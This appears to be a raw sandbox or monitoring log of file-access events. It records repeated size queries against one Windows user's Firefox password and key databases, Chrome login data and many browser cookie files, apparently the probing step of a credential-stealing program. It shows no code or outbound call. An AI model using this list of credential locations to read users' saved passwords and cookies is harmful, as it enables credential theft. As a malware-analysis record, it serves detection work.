Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	type = size	3	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	type = size	3	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	type = size	3	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini	type = size	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	type = size	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@g.live[1].txt	type = size, size_out = 64	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@google[1].txt	type = size, size_out = 278	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\aetadzjz@live[1].txt	type = size, size_out = 95	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ad.360yield[2].txt	type = size, size_out = 443	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ad13.adfarm1.adition[2].txt	type = size, size_out = 89	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@addthis[2].txt	type = size, size_out = 179	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adfarm1.adition[2].txt	type = size, size_out = 101	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adformdsp[2].txt	type = size, size_out = 93	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adform[2].txt	type = size, size_out = 302	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adnxs[2].txt	type = size, size_out = 745	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adscale[1].txt	type = size, size_out = 87	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adserving.ancoraplatform[2].txt	type = size, size_out = 251	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adsrvr[1].txt	type = size, size_out = 243	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@adtech[2].txt	type = size, size_out = 102	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@advertising[1].txt	type = size, size_out = 280	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@angsrvr[2].txt	type = size, size_out = 222	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@api.bing[2].txt	type = size, size_out = 223	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@at.atwola[2].txt	type = size, size_out = 515	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bidswitch[1].txt	type = size, size_out = 289	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bing[1].txt	type = size, size_out = 264	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bluekai[1].txt	type = size, size_out = 162	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bs.serving-sys[1].txt	type = size, size_out = 93	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@bs.serving-sys[3].txt	type = size, size_out = 111	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c.bing[1].txt	type = size, size_out = 560	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c.msn[2].txt	type = size, size_out = 130	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@c1.microsoft[2].txt	type = size, size_out = 144	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@casalemedia[2].txt	type = size, size_out = 537	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@connextra[2].txt	type = size, size_out = 325	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@crwdcntrl[1].txt	type = size, size_out = 296	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@demdex[1].txt	type = size, size_out = 111	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@doubleclick[2].txt	type = size, size_out = 274	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@dpm.demdex[1].txt	type = size, size_out = 112	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@exelator[1].txt	type = size, size_out = 342	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@eyeota[1].txt	type = size, size_out = 103	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@google[2].txt	type = size, size_out = 194	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ibeu2.mookie1[2].txt	type = size, size_out = 311	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@ih.adscale[1].txt	type = size, size_out = 129	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@linkedin[2].txt	type = size, size_out = 269	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@m.exactag[2].txt	type = size, size_out = 118	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@mathtag[2].txt	type = size, size_out = 289	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@microsoft[1].txt	type = size, size_out = 577	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@msn[2].txt	type = size, size_out = 823	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@openx[1].txt	type = size, size_out = 114	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@pixel.rubiconproject[1].txt	type = size, size_out = 111	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@pubmatic[2].txt	type = size, size_out = 187	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@rubiconproject[1].txt	type = size, size_out = 298	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@scorecardresearch[2].txt	type = size, size_out = 204	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@semasio[1].txt	type = size, size_out = 90	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@server.adformdsp[2].txt	type = size, size_out = 108	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@serving-sys[2].txt	type = size, size_out = 460	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@serving.experianmarketingservices[1].txt	type = size, size_out = 413	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@smartadserver[1].txt	type = size, size_out = 287	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@tapad[2].txt	type = size, size_out = 198	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Windows\Cookies\Low\aetadzjz@track.adform[2].txt	type = size, size_out = 177	1	Fn
